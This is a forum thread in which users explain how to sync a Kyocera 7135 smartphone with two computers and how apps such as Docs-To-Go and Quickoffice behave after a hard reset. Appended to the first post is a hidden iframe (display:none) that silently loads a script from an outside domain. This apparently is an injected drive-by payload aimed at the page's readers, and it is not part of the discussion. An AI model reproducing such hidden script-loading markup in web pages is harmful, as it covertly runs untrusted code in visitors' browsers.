+ Reply to Thread

synch'ing with more computer

Ok, I tried searching the archive but didn't find this one....
    I last dealt with this issue while using Windows CE. Can the 7135 be synch'ed with two different computers (office and home)? If so, need I have the same 3rd party programs loaded on both computers?
    Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes, I sync with a computer at home and in the office. Right now I have the same software running on each (Outlook), though different versions. But I have synced in the past with two different programs- Eudora and Outlook. In that situation, I did have syncing problems every once in a while with duplicate entries.

If I have a program like In-Box-To-Go loaded at the office, but not at home, and I have to do a hard reset on the phone (as I have had to do a couple times now), assuming that I have been synching at home all along, would a synch at home after the hard reset put In-Box-To-Go back on the 7135?
    Did that question make sense?

I've never used In-Box-To-Go, but have used Docs-To-Go and Quickoffice between two computers. I didn't have many problems syncing Docs-To-Go between two computers and found either one would restore the 7135 after a hard reset. I haven't been able to get Quickoffice to sync reliably between two computers, though I haven't spent a lot of time trying. Right now, I use one computer as the main one to sync Quickoffice to. I suspect it is an app by app issue.

But my question is, do you have Docs-To-Go (the program) loaded on both desktops? Or, is it enough to have it loaded on one computer and to then synch the 7135 with the other computer?

You can have it only on one computer and it just won't sync the docs to the computer without the program. If I remember correctly, after a hard reset the commputer without the desktop version of the program will still reinstall the docs and pda program, since that comes from the Palm backup file on the desktop. However, I haven't had to do this for awhile and I now use Backupbuddy, so someone should correct me if my memory is faulty.